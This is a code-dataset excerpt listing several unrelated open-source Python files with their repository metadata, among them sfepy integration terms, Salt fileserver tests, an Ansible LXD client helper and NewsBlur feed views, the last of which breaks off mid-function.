text
stringlengths 6
947k
| repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
|
---|---|---|---|---|---|---|
import numpy as nm
from sfepy.base.base import assert_
from sfepy.linalg import dot_sequences
from sfepy.terms.terms import Term, terms
class IntegrateVolumeTerm(Term):
r"""
Evaluate (weighted) variable in a volume region.
Depending on evaluation mode, integrate a variable over a volume region
('eval'), average it in elements ('el_avg') or interpolate it into volume
quadrature points ('qp').
Supports 'eval', 'el_avg' and 'qp' evaluation modes.
:Definition:
.. math::
\int_\Omega y \mbox{ , } \int_\Omega \ul{y} \\
\int_\Omega c y \mbox{ , } \int_\Omega c \ul{y}
.. math::
\mbox{vector for } K \from \Ical_h:
\int_{T_K} y / \int_{T_K} 1 \mbox{ , }
\int_{T_K} \ul{y} / \int_{T_K} 1 \\
\mbox{vector for } K \from \Ical_h:
\int_{T_K} c y / \int_{T_K} 1 \mbox{ , }
\int_{T_K} c \ul{y} / \int_{T_K} 1
.. math::
y|_{qp} \mbox{ , } \ul{y}|_{qp} \\
c y|_{qp} \mbox{ , } c \ul{y}|_{qp}
:Arguments:
- material : :math:`c` (optional)
- parameter : :math:`y` or :math:`\ul{y}`
"""
name = 'ev_volume_integrate'
arg_types = ('opt_material', 'parameter')
arg_shapes = [{'opt_material' : '1, 1', 'parameter' : 1},
{'opt_material' : None},
{'opt_material' : '1, 1', 'parameter' : 'D'},
{'opt_material' : None}]
@staticmethod
def function(out, val_qp, vg, fmode):
if fmode == 2:
out[:] = val_qp
status = 0
else:
status = vg.integrate(out, val_qp, fmode)
return status
def get_fargs(self, material, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
vg, _ = self.get_mapping(parameter)
val_qp = self.get(parameter, 'val')
if material is not None:
val_qp *= material
fmode = {'eval' : 0, 'el_avg' : 1, 'qp' : 2}.get(mode, 1)
return val_qp, vg, fmode
def get_eval_shape(self, material, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
n_el, n_qp, dim, n_en, n_c = self.get_data_shape(parameter)
if mode != 'qp':
n_qp = 1
return (n_el, n_qp, n_c, 1), parameter.dtype
class IntegrateSurfaceTerm(Term):
r"""
Evaluate (weighted) variable in a surface region.
Depending on evaluation mode, integrate a variable over a surface region
('eval'), average it in element faces ('el_avg') or interpolate it into
surface quadrature points ('qp'). For vector variables, setting `term_mode`
to `'flux'` leads to computing corresponding fluxes for the three modes
instead.
Supports 'eval', 'el_avg' and 'qp' evaluation modes.
:Definition:
.. math::
\int_\Gamma y \mbox{ , } \int_\Gamma \ul{y}
\mbox{ , } \int_\Gamma \ul{y} \cdot \ul{n} \\
\int_\Gamma c y \mbox{ , } \int_\Gamma c \ul{y}
\mbox{ , } \int_\Gamma c \ul{y} \cdot \ul{n} \mbox{ flux }
.. math::
\mbox{vector for } K \from \Ical_h:
\int_{T_K} y / \int_{T_K} 1 \mbox{ , }
\int_{T_K} \ul{y} / \int_{T_K} 1 \mbox{ , }
\int_{T_K} (\ul{y} \cdot \ul{n}) / \int_{T_K} 1 \\
\mbox{vector for } K \from \Ical_h:
\int_{T_K} c y / \int_{T_K} 1 \mbox{ , }
\int_{T_K} c \ul{y} / \int_{T_K} 1 \mbox{ , }
\int_{T_K} (c \ul{y} \cdot \ul{n}) / \int_{T_K} 1
.. math::
y|_{qp} \mbox{ , } \ul{y}|_{qp}
\mbox{ , } (\ul{y} \cdot \ul{n})|_{qp} \mbox{ flux } \\
c y|_{qp} \mbox{ , } c \ul{y}|_{qp}
\mbox{ , } (c \ul{y} \cdot \ul{n})|_{qp} \mbox{ flux }
:Arguments:
- material : :math:`c` (optional)
- parameter : :math:`y` or :math:`\ul{y}`
"""
name = 'ev_surface_integrate'
arg_types = ('opt_material', 'parameter')
arg_shapes = [{'opt_material' : '1, 1', 'parameter' : 1},
{'opt_material' : None},
{'opt_material' : '1, 1', 'parameter' : 'D'},
{'opt_material' : None}]
integration = 'surface'
@staticmethod
def function(out, val_qp, sg, fmode):
if fmode == 2:
out[:] = val_qp
status = 0
elif fmode == 5:
normal = sg.normal
out[:] = dot_sequences(val_qp, normal)
status = 0
else:
status = sg.integrate(out, val_qp, fmode)
return status
def get_fargs(self, material, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
sg, _ = self.get_mapping(parameter)
val_qp = self.get(parameter, 'val')
if material is not None:
val_qp *= material
fmode = {'eval' : 0, 'el_avg' : 1, 'qp' : 2}.get(mode, 1)
if term_mode == 'flux':
n_fa, n_qp, dim, n_fn, n_c = self.get_data_shape(parameter)
if n_c == dim:
fmode += 3
return val_qp, sg, fmode
def get_eval_shape(self, material, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
n_fa, n_qp, dim, n_fn, n_c = self.get_data_shape(parameter)
if mode != 'qp':
n_qp = 1
if term_mode == 'flux':
n_c = 1
return (n_fa, n_qp, n_c, 1), parameter.dtype
class IntegrateVolumeOperatorTerm(Term):
r"""
Volume integral of a test function weighted by a scalar function
:math:`c`.
:Definition:
.. math::
\int_\Omega q \mbox{ or } \int_\Omega c q
:Arguments:
- material : :math:`c` (optional)
- virtual : :math:`q`
"""
name = 'dw_volume_integrate'
arg_types = ('opt_material', 'virtual')
arg_shapes = [{'opt_material' : '1, 1', 'virtual' : (1, None)},
{'opt_material' : None}]
@staticmethod
def function(out, material, bf, geo):
bf_t = nm.tile(bf.transpose((0, 1, 3, 2)), (out.shape[0], 1, 1, 1))
bf_t = nm.ascontiguousarray(bf_t)
if material is not None:
status = geo.integrate(out, material * bf_t)
else:
status = geo.integrate(out, bf_t)
return status
def get_fargs(self, material, virtual,
mode=None, term_mode=None, diff_var=None, **kwargs):
assert_(virtual.n_components == 1)
geo, _ = self.get_mapping(virtual)
return material, geo.bf, geo
class IntegrateSurfaceOperatorTerm(IntegrateVolumeOperatorTerm):
r"""
Surface integral of a test function weighted by a scalar function
:math:`c`.
:Definition:
.. math::
\int_{\Gamma} q \mbox{ or } \int_\Gamma c q
:Arguments:
- material : :math:`c` (optional)
- virtual : :math:`q`
"""
name = 'dw_surface_integrate'
arg_types = ('opt_material', 'virtual')
arg_shapes = [{'opt_material' : '1, 1', 'virtual' : (1, None)},
{'opt_material' : None}]
integration = 'surface'
class VolumeTerm(Term):
r"""
Volume of a domain. Uses approximation of the parameter variable.
:Definition:
.. math::
\int_\Omega 1
:Arguments:
- parameter : any variable
"""
name = 'd_volume'
arg_types = ('parameter',)
arg_shapes = {'parameter' : 1}
@staticmethod
def function(out, geo):
out[:] = geo.volume
return 0
def get_fargs(self, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
geo, _ = self.get_mapping(parameter)
return geo,
def get_eval_shape(self, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
n_cell, n_qp, dim, n_n, n_c = self.get_data_shape(parameter)
return (n_cell, 1, 1, 1), parameter.dtype
class SurfaceTerm(VolumeTerm):
r"""
Surface of a domain. Uses approximation of the parameter variable.
:Definition:
.. math::
\int_\Gamma 1
:Arguments:
- parameter : any variable
"""
name = 'd_surface'
arg_types = ('parameter',)
arg_shapes = {'parameter' : 1}
integration = 'surface'
class VolumeSurfaceTerm(Term):
r"""
Volume of a :math:`D`-dimensional domain, using a surface integral. Uses
approximation of the parameter variable.
:Definition:
.. math::
1 / D \int_\Gamma \ul{x} \cdot \ul{n}
:Arguments:
- parameter : any variable
"""
name = 'd_volume_surface'
arg_types = ('parameter',)
arg_shapes = {'parameter' : 1}
integration = 'surface'
function = staticmethod(terms.d_volume_surface)
def get_fargs(self, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
ap, sg = self.get_approximation(parameter)
sd = ap.surface_data[self.region.name]
coor = parameter.field.get_coor()
return coor, sg, sd.econn.copy()
def get_eval_shape(self, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
n_fa, n_qp, dim, n_fn, n_c = self.get_data_shape(parameter)
return (n_fa, 1, 1, 1), parameter.dtype
class SurfaceMomentTerm(Term):
r"""
Surface integral of the outer product of the unit outward normal
:math:`\ul{n}` and the coordinate :math:`\ul{x}` shifted by :math:`\ul{x}_0`
:Definition:
.. math::
\int_{\Gamma} \ul{n} (\ul{x} - \ul{x}_0)
:Arguments:
- parameter : any variable
- shift : :math:`\ul{x}_0`
"""
name = 'di_surface_moment'
arg_types = ('parameter', 'shift')
integration = 'surface'
function = staticmethod(terms.di_surface_moment)
def get_fargs(self, parameter, shift,
mode=None, term_mode=None, diff_var=None, **kwargs):
ap, sg = self.get_approximation(parameter)
sd = ap.surface_data[self.region.name]
coor = parameter.field.get_coor() \
- nm.asarray(shift, dtype=nm.float64)[None,:]
return coor, sg, sd.econn.copy()
def get_eval_shape(self, parameter, shift,
mode=None, term_mode=None, diff_var=None, **kwargs):
n_fa, n_qp, dim, n_fn, n_c = self.get_data_shape(parameter)
return (n_fa, 1, dim, dim), parameter.dtype
class IntegrateMatTerm(Term):
r"""
Evaluate material parameter :math:`m` in a volume/surface region.
Depending on evaluation mode, integrate a material parameter over a
volume/surface region ('eval'), average it in elements/faces ('el_avg') or
interpolate it into volume/surface quadrature points ('qp').
Uses reference mapping of :math:`y` variable.
Supports 'eval', 'el_avg' and 'qp' evaluation modes.
:Definition:
.. math::
\int_\Omega m
.. math::
\mbox{vector for } K \from \Ical_h: \int_{T_K} m / \int_{T_K} 1
.. math::
m|_{qp}
:Arguments:
- material : :math:`m` (can have up to two dimensions)
- parameter : :math:`y`
"""
name = 'ev_integrate_mat'
arg_types = ('material', 'parameter')
arg_shapes = [{'material' : '1, 1', 'parameter' : 1},
{'material' : 'D, D'},
{'material' : 'S, S'},
{'material' : 'D, S'}]
@staticmethod
def function(out, mat, geo, fmode):
if fmode == 2:
out[:] = mat
status = 0
else:
status = geo.integrate(out, mat, fmode)
return status
def get_fargs(self, mat, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
geo, _ = self.get_mapping(parameter)
fmode = {'eval' : 0, 'el_avg' : 1, 'qp' : 2}.get(mode, 1)
return mat, geo, fmode
def get_eval_shape(self, mat, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
n_el, n_qp, dim, n_en, n_c = self.get_data_shape(parameter)
n_row, n_col = mat.shape[-2:]
if mode != 'qp':
n_qp = 1
return (n_el, n_qp, n_row, n_col), mat.dtype
class SumNodalValuesTerm(Term):
r"""
Sum nodal values.
:Arguments:
- parameter : :math:`p` or :math:`\ul{u}`
"""
name = 'd_sum_vals'
arg_types = ('parameter',)
arg_shapes = [{'parameter' : 1}, {'parameter' : 'D'}]
@staticmethod
def function(out, vec):
out[:] = nm.sum(vec, 0)
return 0
def get_fargs(self, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
vec = parameter.get_state_in_region(self.region)
return vec,
def get_eval_shape(self, parameter,
mode=None, term_mode=None, diff_var=None, **kwargs):
n_el, n_qp, dim, n_en, n_c = self.get_data_shape(parameter)
return (n_el, n_c), parameter.dtype
|
RexFuzzle/sfepy
|
sfepy/terms/terms_basic.py
|
Python
|
bsd-3-clause
| 12,864 | 0.003887 |
"""
:codeauthor: Joao Mesquita <jmesquita@sangoma.com>
"""
import datetime
import os
import time
import salt.utils.files
from salt import fileserver
from tests.support.helpers import with_tempdir
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import TestCase
class MapDiffTestCase(TestCase):
def test_diff_with_diffent_keys(self):
"""
Test that different maps are indeed reported different
"""
map1 = {"file1": 1234}
map2 = {"file2": 1234}
assert fileserver.diff_mtime_map(map1, map2) is True
def test_diff_with_diffent_values(self):
"""
Test that different maps are indeed reported different
"""
map1 = {"file1": 12345}
map2 = {"file1": 1234}
assert fileserver.diff_mtime_map(map1, map2) is True
class VCSBackendWhitelistCase(TestCase, LoaderModuleMockMixin):
def setup_loader_modules(self):
return {fileserver: {}}
def test_whitelist(self):
opts = {
"fileserver_backend": ["roots", "git", "s3fs", "hgfs", "svn"],
"extension_modules": "",
}
fs = fileserver.Fileserver(opts)
assert sorted(fs.servers.whitelist) == sorted(
["git", "gitfs", "hg", "hgfs", "svn", "svnfs", "roots", "s3fs"]
), fs.servers.whitelist
@with_tempdir()
def test_future_file_list_cache_file_ignored(self, cachedir):
opts = {
"fileserver_backend": ["roots"],
"cachedir": cachedir,
"extension_modules": "",
}
back_cachedir = os.path.join(cachedir, "file_lists/roots")
os.makedirs(os.path.join(back_cachedir))
# Touch a couple files
for filename in ("base.p", "foo.txt"):
with salt.utils.files.fopen(
os.path.join(back_cachedir, filename), "wb"
) as _f:
if filename == "base.p":
_f.write(b"\x80")
# Set modification time to file list cache file to 1 year in the future
now = datetime.datetime.utcnow()
future = now + datetime.timedelta(days=365)
mod_time = time.mktime(future.timetuple())
os.utime(os.path.join(back_cachedir, "base.p"), (mod_time, mod_time))
list_cache = os.path.join(back_cachedir, "base.p")
w_lock = os.path.join(back_cachedir, ".base.w")
ret = fileserver.check_file_list_cache(opts, "files", list_cache, w_lock)
assert (
ret[1] is True
), "Cache file list cache file is not refreshed when future modification time"
|
saltstack/salt
|
tests/unit/test_fileserver.py
|
Python
|
apache-2.0
| 2,610 | 0.000766 |
class Solution:
"""
@param s: The first string
@param b: The second string
@return true or false
"""
# Time: is equal to sorted O(nlogn)
# Space: O(1)
def anagram(self, s, t):
# write your code here
s = sorted(s)
t = sorted(t)
return s == t
|
rosegun38/LintCode
|
Two_Strings_Are_Anagrams/Solution.py
|
Python
|
gpl-3.0
| 307 | 0 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
sql_template0 = """alter table _shadow_orders_{0}_ modify fingerprint text DEFAULT '' COMMENT '下单fingerprint';"""
if __name__ == '__main__':
for index in range(0, 50):
print(sql_template0.format(index))
print("------")
for index in range(50, 100):
print(sql_template0.format(index))
|
yaolei313/python-study
|
base/test.py
|
Python
|
gpl-2.0
| 365 | 0.00554 |
import sublime
HOST_PLATFORM = sublime.platform()
WINDOWS = 'windows'
LINUX = 'linux'
OSX = 'osx'
|
SublimeText/VintageEx
|
plat/__init__.py
|
Python
|
mit
| 109 | 0 |
# -*- coding: utf-8 -*-
# (c) 2016, Hiroaki Nakamura <hnakamur@gmail.com>
#
# This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
try:
import json
except ImportError:
import simplejson as json
# httplib/http.client connection using unix domain socket
import socket
import ssl
try:
from httplib import HTTPConnection, HTTPSConnection
except ImportError:
# Python 3
from http.client import HTTPConnection, HTTPSConnection
class UnixHTTPConnection(HTTPConnection):
def __init__(self, path):
HTTPConnection.__init__(self, 'localhost')
self.path = path
def connect(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(self.path)
self.sock = sock
from ansible.module_utils.urls import generic_urlparse
try:
from urlparse import urlparse
except ImportError:
# Python 3
from url.parse import urlparse
class LXDClientException(Exception):
def __init__(self, msg, **kwargs):
self.msg = msg
self.kwargs = kwargs
class LXDClient(object):
def __init__(self, url, key_file=None, cert_file=None, debug=False):
"""LXD Client.
:param url: The URL of the LXD server. (e.g. unix:/var/lib/lxd/unix.socket or https://127.0.0.1)
:type url: ``str``
:param key_file: The path of the client certificate key file.
:type key_file: ``str``
:param cert_file: The path of the client certificate file.
:type cert_file: ``str``
:param debug: The debug flag. The request and response are stored in logs when debug is true.
:type debug: ``bool``
"""
self.url = url
self.debug = debug
self.logs = []
if url.startswith('https:'):
self.cert_file = cert_file
self.key_file = key_file
parts = generic_urlparse(urlparse(self.url))
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ctx.load_cert_chain(cert_file, keyfile=key_file)
self.connection = HTTPSConnection(parts.get('netloc'), context=ctx)
elif url.startswith('unix:'):
unix_socket_path = url[len('unix:'):]
self.connection = UnixHTTPConnection(unix_socket_path)
else:
raise LXDClientException('URL scheme must be unix: or https:')
def do(self, method, url, body_json=None, ok_error_codes=None, timeout=None):
resp_json = self._send_request(method, url, body_json=body_json, ok_error_codes=ok_error_codes, timeout=timeout)
if resp_json['type'] == 'async':
url = '{0}/wait'.format(resp_json['operation'])
resp_json = self._send_request('GET', url)
if resp_json['metadata']['status'] != 'Success':
self._raise_err_from_json(resp_json)
return resp_json
def authenticate(self, trust_password):
body_json = {'type': 'client', 'password': trust_password}
return self._send_request('POST', '/1.0/certificates', body_json=body_json)
def _send_request(self, method, url, body_json=None, ok_error_codes=None, timeout=None):
try:
body = json.dumps(body_json)
self.connection.request(method, url, body=body)
resp = self.connection.getresponse()
resp_json = json.loads(resp.read())
self.logs.append({
'type': 'sent request',
'request': {'method': method, 'url': url, 'json': body_json, 'timeout': timeout},
'response': {'json': resp_json}
})
resp_type = resp_json.get('type', None)
if resp_type == 'error':
if ok_error_codes is not None and resp_json['error_code'] in ok_error_codes:
return resp_json
if resp_json['error'] == "Certificate already in trust store":
return resp_json
self._raise_err_from_json(resp_json)
return resp_json
except socket.error as e:
raise LXDClientException('cannot connect to the LXD server', err=e)
def _raise_err_from_json(self, resp_json):
err_params = {}
if self.debug:
err_params['logs'] = self.logs
raise LXDClientException(self._get_err_from_resp_json(resp_json), **err_params)
@staticmethod
def _get_err_from_resp_json(resp_json):
err = None
metadata = resp_json.get('metadata', None)
if metadata is not None:
err = metadata.get('err', None)
if err is None:
err = resp_json.get('error', None)
return err
|
camradal/ansible
|
lib/ansible/module_utils/lxd.py
|
Python
|
gpl-3.0
| 6,180 | 0.004045 |
#!/usr/bin/env python
import matplotlib.pyplot as plt
import os
import math as m
import numpy as np
def Gaus(v,mu,sigma):
"Gaussian distribution"
return np.exp(-0.5*((v-mu)/sigma)**2)/(sigma*m.sqrt(2*m.pi))
mu = 0.5;
sigma = 1.5;
print "reading file..."
gausFile = open("gausRandom.out", 'r')
gausNums = map(float,gausFile.read().split())
gausFile.close()
gausBins = np.linspace(mu-5*sigma, mu+5*sigma);
gausPoints = gausBins[:-1] - np.diff(gausBins)
plt.hist(gausNums,bins=gausBins,normed=True);
plt.plot(gausPoints, Gaus(gausPoints, mu, sigma))
plt.show()
|
htimko/ArcPIC
|
pic2d/tests/rngtestAna.py
|
Python
|
gpl-3.0
| 571 | 0.019264 |
from pivoteer import *
from pivotEngine import *
from pivotUtils import *
|
BechtelCIRT/pivoteer
|
pivoteer/__init__.py
|
Python
|
mit
| 74 | 0 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewayBackendAddressPool(SubResource):
"""Backend Address Pool of an application gateway.
:param id: Resource ID.
:type id: str
:param backend_ip_configurations: Collection of references to IPs defined
in network interfaces.
:type backend_ip_configurations:
list[~azure.mgmt.network.v2018_01_01.models.NetworkInterfaceIPConfiguration]
:param backend_addresses: Backend addresses
:type backend_addresses:
list[~azure.mgmt.network.v2018_01_01.models.ApplicationGatewayBackendAddress]
:param provisioning_state: Provisioning state of the backend address pool
resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
:type provisioning_state: str
:param name: Resource that is unique within a resource group. This name
can be used to access the resource.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
:param type: Type of the resource.
:type type: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'backend_ip_configurations': {'key': 'properties.backendIPConfigurations', 'type': '[NetworkInterfaceIPConfiguration]'},
'backend_addresses': {'key': 'properties.backendAddresses', 'type': '[ApplicationGatewayBackendAddress]'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, **kwargs):
super(ApplicationGatewayBackendAddressPool, self).__init__(**kwargs)
self.backend_ip_configurations = kwargs.get('backend_ip_configurations', None)
self.backend_addresses = kwargs.get('backend_addresses', None)
self.provisioning_state = kwargs.get('provisioning_state', None)
self.name = kwargs.get('name', None)
self.etag = kwargs.get('etag', None)
self.type = kwargs.get('type', None)
|
lmazuel/azure-sdk-for-python
|
azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/application_gateway_backend_address_pool.py
|
Python
|
mit
| 2,589 | 0.001545 |
#
# mjmud - The neverending MUD project
#
# Copyright (c) 2014, Matt Jordan
#
# See https://github.com/matt-jordan/mjmud for more information about the
# project. Please do not contact the maintainers of the project for information
# or assistance. The project uses Github for these purposes.
#
# This program is free software, distributed under the conditions of the MIT
# License (MIT). See the LICENSE file at the top of the source tree for
# details.
from zope.interface import Interface
class IWebSocketReceiver(Interface):
def on_message_received(protocol, json_msg):
"""Receive and process a JSON message
Keyword Arguments:
protocol -- the websocket protocol that received the JSON message
json_msg -- the JSON object received from the protocol's peer
"""
def on_connected(protocol, peer):
"""Called when a connection is established
Keyword Arguments:
protocol -- the websocket protocol that is serving the peer
peer -- the peer that connected
"""
def on_closed(protocol, was_clean, code, reason):
"""Called when a connection is closed
Keyword Arguments:
protocol -- the websocket protocol that disconnected
was_clean -- true if the handshake occurred; false otherwise
code -- numeric code describing the disconnection
reason -- why the disconnection occurred
"""
class IWebSocketClientReceiver(Interface):
def on_connection_failed(protocol, connector, reason):
"""Called when a client connection fails
Keyword Arguments:
protocol -- the websocket client protocol that failed
connector -- the connection object
reason -- why the connection failed
"""
class ReceiverError(Exception):
"""An exception occurred in a protocol receiver"""
pass
|
matt-jordan/mjmud
|
lib/transports/ws_receiver.py
|
Python
|
mit
| 1,886 | 0 |
import datetime
from urlparse import urlparse
from utils import log as logging
from django.shortcuts import get_object_or_404, render_to_response
from django.views.decorators.http import condition
from django.http import HttpResponseForbidden, HttpResponseRedirect, HttpResponse, Http404
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
# from django.db import IntegrityError
from apps.rss_feeds.models import Feed, merge_feeds
from apps.rss_feeds.models import MFetchHistory
from apps.rss_feeds.models import MFeedIcon
from apps.push.models import PushSubscription
from apps.analyzer.models import get_classifiers_for_user
from apps.reader.models import UserSubscription
from apps.rss_feeds.models import MStory
from utils.user_functions import ajax_login_required
from utils import json_functions as json, feedfinder2 as feedfinder
from utils.feed_functions import relative_timeuntil, relative_timesince
from utils.user_functions import get_user
from utils.view_functions import get_argument_or_404
from utils.view_functions import required_params
from utils.view_functions import is_true
from vendor.timezones.utilities import localtime_for_timezone
from utils.ratelimit import ratelimit
IGNORE_AUTOCOMPLETE = [
"facebook.com/feeds/notifications.php",
"inbox",
"secret",
"password",
"latitude",
]
@ajax_login_required
@json.json_view
def search_feed(request):
address = request.REQUEST.get('address')
offset = int(request.REQUEST.get('offset', 0))
if not address:
return dict(code=-1, message="Please provide a URL/address.")
logging.user(request.user, "~FBFinding feed (search_feed): %s" % address)
ip = request.META.get('HTTP_X_FORWARDED_FOR', None) or request.META['REMOTE_ADDR']
logging.user(request.user, "~FBIP: %s" % ip)
aggressive = request.user.is_authenticated()
feed = Feed.get_feed_from_url(address, create=False, aggressive=aggressive, offset=offset)
if feed:
return feed.canonical()
else:
return dict(code=-1, message="No feed found matching that XML or website address.")
@json.json_view
def load_single_feed(request, feed_id):
user = get_user(request)
feed = get_object_or_404(Feed, pk=feed_id)
classifiers = get_classifiers_for_user(user, feed_id=feed.pk)
payload = feed.canonical(full=True)
payload['classifiers'] = classifiers
return payload
def feed_favicon_etag(request, feed_id):
try:
feed_icon = MFeedIcon.objects.get(feed_id=feed_id)
except MFeedIcon.DoesNotExist:
return
return feed_icon.color
@condition(etag_func=feed_favicon_etag)
def load_feed_favicon(request, feed_id):
not_found = False
try:
feed_icon = MFeedIcon.objects.get(feed_id=feed_id)
except MFeedIcon.DoesNotExist:
not_found = True
if not_found or not feed_icon.data:
return HttpResponseRedirect(settings.MEDIA_URL + 'img/icons/circular/world.png')
icon_data = feed_icon.data.decode('base64')
return HttpResponse(icon_data, mimetype='image/png')
@json.json_view
def feed_autocomplete(request):
query = request.GET.get('term') or request.GET.get('query')
version = int(request.GET.get('v', 1))
format = request.GET.get('format', 'autocomplete')
# user = get_user(request)
# if True or not user.profile.is_premium:
# return dict(code=-1, message="Overloaded, no autocomplete results.", feeds=[], term=query)
if not query:
return dict(code=-1, message="Specify a search 'term'.", feeds=[], term=query)
if '.' in query:
try:
parts = urlparse(query)
if not parts.hostname and not query.startswith('http'):
parts = urlparse('http://%s' % query)
if parts.hostname:
query = [parts.hostname]
query.extend([p for p in parts.path.split('/') if p])
query = ' '.join(query)
except:
logging.user(request, "~FGAdd search, could not parse url in ~FR%s" % query)
query_params = query.split(' ')
tries_left = 5
while len(query_params) and tries_left:
tries_left -= 1
feed_ids = Feed.autocomplete(' '.join(query_params))
if feed_ids:
break
else:
query_params = query_params[:-1]
feeds = list(set([Feed.get_by_id(feed_id) for feed_id in feed_ids]))
feeds = [feed for feed in feeds if feed and not feed.branch_from_feed]
feeds = [feed for feed in feeds if all([x not in feed.feed_address for x in IGNORE_AUTOCOMPLETE])]
if format == 'autocomplete':
feeds = [{
'id': feed.pk,
'value': feed.feed_address,
'label': feed.feed_title,
'tagline': feed.data and feed.data.feed_tagline,
'num_subscribers': feed.num_subscribers,
} for feed in feeds]
else:
feeds = [feed.canonical(full=True) for feed in feeds]
feeds = sorted(feeds, key=lambda f: -1 * f['num_subscribers'])
feed_ids = [f['id'] for f in feeds]
feed_icons = dict((icon.feed_id, icon) for icon in MFeedIcon.objects.filter(feed_id__in=feed_ids))
for feed in feeds:
if feed['id'] in feed_icons:
feed_icon = feed_icons[feed['id']]
if feed_icon.data:
feed['favicon_color'] = feed_icon.color
feed['favicon'] = feed_icon.data
logging.user(request, "~FGAdd Search: ~SB%s ~SN(%s matches)" % (query, len(feeds),))
if version > 1:
return {
'feeds': feeds,
'term': query,
}
else:
return feeds
@ratelimit(minutes=1, requests=30)
@json.json_view
def load_feed_statistics(request, feed_id):
user = get_user(request)
timezone = user.profile.timezone
stats = dict()
feed = get_object_or_404(Feed, pk=feed_id)
feed.update_all_statistics()
feed.set_next_scheduled_update(verbose=True, skip_scheduling=True)
feed.save_feed_story_history_statistics()
feed.save_classifier_counts()
# Dates of last and next update
stats['active'] = feed.active
stats['last_update'] = relative_timesince(feed.last_update)
stats['next_update'] = relative_timeuntil(feed.next_scheduled_update)
stats['push'] = feed.is_push
if feed.is_push:
try:
stats['push_expires'] = localtime_for_timezone(feed.push.lease_expires,
timezone).strftime("%Y-%m-%d %H:%M:%S")
except PushSubscription.DoesNotExist:
stats['push_expires'] = 'Missing push'
feed.is_push = False
feed.save()
# Minutes between updates
update_interval_minutes = feed.get_next_scheduled_update(force=True, verbose=False)
stats['update_interval_minutes'] = update_interval_minutes
original_active_premium_subscribers = feed.active_premium_subscribers
original_premium_subscribers = feed.premium_subscribers
feed.active_premium_subscribers = max(feed.active_premium_subscribers+1, 1)
feed.premium_subscribers += 1
premium_update_interval_minutes = feed.get_next_scheduled_update(force=True, verbose=False,
premium_speed=True)
feed.active_premium_subscribers = original_active_premium_subscribers
feed.premium_subscribers = original_premium_subscribers
stats['premium_update_interval_minutes'] = premium_update_interval_minutes
stats['errors_since_good'] = feed.errors_since_good
# Stories per month - average and month-by-month breakout
average_stories_per_month, story_count_history = feed.average_stories_per_month, feed.data.story_count_history
stats['average_stories_per_month'] = average_stories_per_month
story_count_history = story_count_history and json.decode(story_count_history)
if story_count_history and isinstance(story_count_history, dict):
stats['story_count_history'] = story_count_history['months']
stats['story_days_history'] = story_count_history['days']
stats['story_hours_history'] = story_count_history['hours']
else:
stats['story_count_history'] = story_count_history
# Rotate hours to match user's timezone offset
localoffset = timezone.utcoffset(datetime.datetime.utcnow())
hours_offset = int(localoffset.total_seconds() / 3600)
rotated_hours = {}
for hour, value in stats['story_hours_history'].items():
rotated_hours[str(int(hour)+hours_offset)] = value
stats['story_hours_history'] = rotated_hours
# Subscribers
stats['subscriber_count'] = feed.num_subscribers
stats['num_subscribers'] = feed.num_subscribers
stats['stories_last_month'] = feed.stories_last_month
stats['last_load_time'] = feed.last_load_time
stats['premium_subscribers'] = feed.premium_subscribers
stats['active_subscribers'] = feed.active_subscribers
